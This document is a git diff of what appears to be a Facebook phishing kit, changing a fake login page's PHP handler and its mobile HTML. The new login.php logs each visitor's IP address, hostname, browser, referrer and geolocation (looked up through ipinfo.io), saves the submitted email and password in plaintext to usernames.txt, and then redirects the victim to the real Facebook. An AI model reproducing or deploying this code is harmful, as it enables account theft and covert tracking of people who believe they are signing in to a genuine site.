diff --git a/WebPages/fb_standard/login.php b/WebPages/fb_standard/login.php index d9317b2..92aeffe 100644 --- a/WebPages/fb_standard/login.php +++ b/WebPages/fb_standard/login.php @@ -1,54 +1,42 @@ loc.' [6]ISP = ' // latitude, longitude - .$details->org.' [7]CITY = ' // internet service provider - .$details->city.' [8]STATE = ' // city - .$details->region.' [9]COUNTRY = ' // state - .$details->country.' [10]DATE & TIME = ' // country - .date("D dS M,Y h:i a").'________________________________________________[DONE BY AN0NUD4Y]' // date - ."\n" - ; - $write = fputs($fileHandle, $string); - @ fclose($fileHandle); - } +// Name of the ip address log. +$outputWebBug = 'iplog.txt'; -$var = $_POST['email']; -$var2 = $_POST['pass']; -$myFile = file_get_contents("protect.html"); -$searchString = "WELCOME TO FACEBOOK"; -if($myFile != $searchString) { - file_put_contents("usernames.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND); - header('Location: https://facebook.com/'); -} -if($myFile != $searchString) { - echo "LOGIN SUCCESSFULL"; - header('Location: https://facebook.com/'); -} +// Get the ip address and info about client. +@$details = json_decode(file_get_contents("http://ipinfo.io/{$_SERVER['REMOTE_ADDR']}/json")); +@$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']); + +// Get the query string from the URL. +$QUERY_STRING = preg_replace("%[^/a-zA-Z0-9@,_=]%", '', $_SERVER['QUERY_STRING']); + +// Write the ip address and info to file. +@$fileHandle = fopen($outputWebBug, "a"); + +if ($fileHandle) + { + $string = 'INFORMATION_ACCESSED-------------------------------------------------------------------' . $QUERY_STRING . ' [1]IP-ADDRESS = ' // everything after "?" in the URL + . $_SERVER['REMOTE_ADDR'] . ' [2]HOSTNAME = ' // ip address + . $hostname . ' [3]BROWSER & SYSTEM = ' // hostname + . $_SERVER['HTTP_USER_AGENT'] . ' [4]REDIRECTED-BY = ' // browser and operating system + . $_SERVER['HTTP_REFERER'] . ' [5]LATITUDE-LONGITUDE = ' // where they got the link for this page + . $details->loc . ' [6]ISP = ' // latitude, longitude + . $details->org . ' [7]CITY = ' // internet service provider + . $details->city . ' [8]STATE = ' // city + . $details->region . ' [9]COUNTRY = ' // state + . $details->country . ' [10]DATE & TIME = ' // country + . date("D dS M,Y h:i a") . '________________________________________________[DONE BY AN0NUD4Y]' // date + . "\n"; + $write = fputs($fileHandle, $string); + @fclose($fileHandle); + } + +file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['email'] . " [PASS]: " . $_POST['pass'] . "\n", FILE_APPEND); +header('Location: https://facebook.com/'); exit(); ?> - diff --git a/WebPages/fb_standard/mobile.html b/WebPages/fb_standard/mobile.html index 09a8aac..5ed6950 100644 --- a/WebPages/fb_standard/mobile.html +++ b/WebPages/fb_standard/mobile.html @@ -1,2 +1 @@ - -Facebook – log in or sign up

Facebook

+Facebook – log in or sign up

Facebook

\ No newline at end of file